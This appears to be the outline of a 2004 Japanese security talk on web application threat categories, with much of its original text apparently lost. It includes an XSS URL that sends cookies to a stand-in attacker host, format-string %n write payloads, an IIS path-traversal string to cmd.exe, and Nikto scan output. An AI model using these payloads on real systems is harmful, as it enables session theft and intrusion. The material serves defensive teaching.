JPNIC / JPCERT/CC 2004 (Web), 2004/10/4, <shio@st.rim.or.jp>
Basis: the WASC (Web Application Security Consortium) Web Security Threat Classification (URL in the references at the end).
...? It depends! ...? It depends!
...? It depends!
Web application layer: Cross-site Scripting, SQL, ...; OS / network layer: SYN Flood, IP, ARP, TCP Reset, ...
Overview (Web, ID, HTTP, LDAP, OS, SQL, SSI, XPath), following the WASC Web Security Threat Classification.
Authentication: Brute Force; Insufficient Authentication; Weak Password Recovery Validation
  Brute Force: IDs
  Insufficient Authentication: URL, /admin/, Security Through Obscurity
  Weak Password Recovery Validation
Authorization: Credential/Session Prediction; Insufficient Authorization; Insufficient Session Expiration; Session Fixation
  Session IDs: HTTP, TCP, ID
  Credential/Session Prediction: session ID
  [figure: session ID example, SID:1234 / SID:1235]
  Insufficient Authorization: URL, Security Through Obscurity
  Insufficient Session Expiration: session ID, XSS, back, SSL
  Session Fixation: fixing the session ID; HTML, URL, XSS (Cross-site Scripting), Cookie; ID, IP
  [figure: session ID example, SID:1234, HTML]
Client-side Attacks: Content Spoofing; Cross-site Scripting
  Content Spoofing: URL
  Cross-site Scripting (XSS): JavaScript/VBScript, IE, Cookie, ID
  Example: http://server/cgi?name=joe shows "Hello Joe!" (with a Cookie); with
    http://server/cgi?name=<script>document.location='http://attacker/getcookie?'+document.cookie</script>
  the Cookie is sent to http://attacker/getcookie instead.
Command Execution: Buffer Overflow; Format String Attack; LDAP Injection; OS Commanding; SQL Injection; SSI Injection; XPath Injection
  Buffer Overflow: C/C++ CGI (C)
  [figure: BOF (buffer overflow)]
  Format String Attack: printf() format specifiers (%s, %d, %x, ...); printf(buf); with buf taken from input, in C/C++ CGI; %x, %n (writes 4 bytes)
    printf("%x", 1); prints 1 in hexadecimal. printf(buf); with buf = "%x" likewise prints whatever is read as the argument, in hexadecimal.
    int i; printf("abcd%n", &i); sets i to 4. printf(buf); with buf = "0xbffff658%x%x%x%x...%n" writes N to address 0xbffff658.
  LDAP Injection: LDAP
  OS Commanding: Perl, C, PHP, ...
  SQL Injection: UNION
  SSI Injection: SSI, HTML, OS
  XPath Injection: XPath, XML
Information Disclosure: Directory Indexing; Information Leakage; Path Traversal; Predictable Resource Location
  Directory Indexing: URL; Apache 1.3: GET //////////... HTTP/1.0; Google
  Information Leakage: HTML, IP
  Path Traversal: Unicode, UTF-8, NULL (%00), OS
  Predictable Resource Location: .bak .old .org .orig; .conf .cfg .config; .dat .data; /admin/ /backup/ /logs/ ...
  Nikto (Web scanner): http://www.cirt.net/code/nikto.shtml
    $ perl nikto.pl -nolookup -host 192.168.183.12
    ---------------------------------------------------------------------------
    - Nikto 1.34/1.29 - www.cirt.net
    + Target IP: 192.168.183.12
    + Target Hostname: 192.168.183.12
    + Target Port: 80
    + Start Time: Thu Sep 30 07:27:42 2004
    ---------------------------------------------------------------------------
    ...
    + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
    + /<script>alert('vulnerable')</script>.shtml - Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)
    ...
    + /blahb.ida - Reveals physical path.
    ...
    + /xxxxx.htw - Server may be vulnerable to a Webhits.dll arbitrary file retrieval.
    ...
    + /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir - IIS is vulnerable to a double-decode bug, which allows...
    ...
    + /_vti_bin/fpcount.exe - Frontpage counter CGI has been found.
    ...
    + 2648 items checked - 20 item(s) found on remote host(s)
    + End Time: Thu Sep 30 07:28:28 2004 (46 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
Logical Attacks: Abuse of Functionality; Denial of Service; Insufficient Anti-automation; Insufficient Process Validation
  Abuse of Functionality: hidden, Frontpage Server Extensions, IIS WebDAV
  Denial of Service: SQL
  Insufficient Anti-automation
  Insufficient Process Validation: hidden, Cookie
Other: HTTP Response Splitting (Location header), Web Server/Application Fingerprinting, Cookie
...? ID? SQL? ... Web
Web...!!
References:
  WASC Web Security Threat Classification: http://www.webappsec.org/threat.html
  OWASP Top Ten: http://www.owasp.org/documentation/topten.html
  OWASP, A Guide to Building Secure Web Applications: http://www.owasp.org/documentation/guide/guide_about.html
  @IT (Web): http://www.atmarkit.co.jp/fsecurity/rensai/webhole01/webhole01.htm
  @IT: http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html
  HTTP Response Splitting: http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf
  The Google Hackers Guide: http://johnny.ihackstuff.com/security/premium/the_google_hackers_guide_v1.0.pdf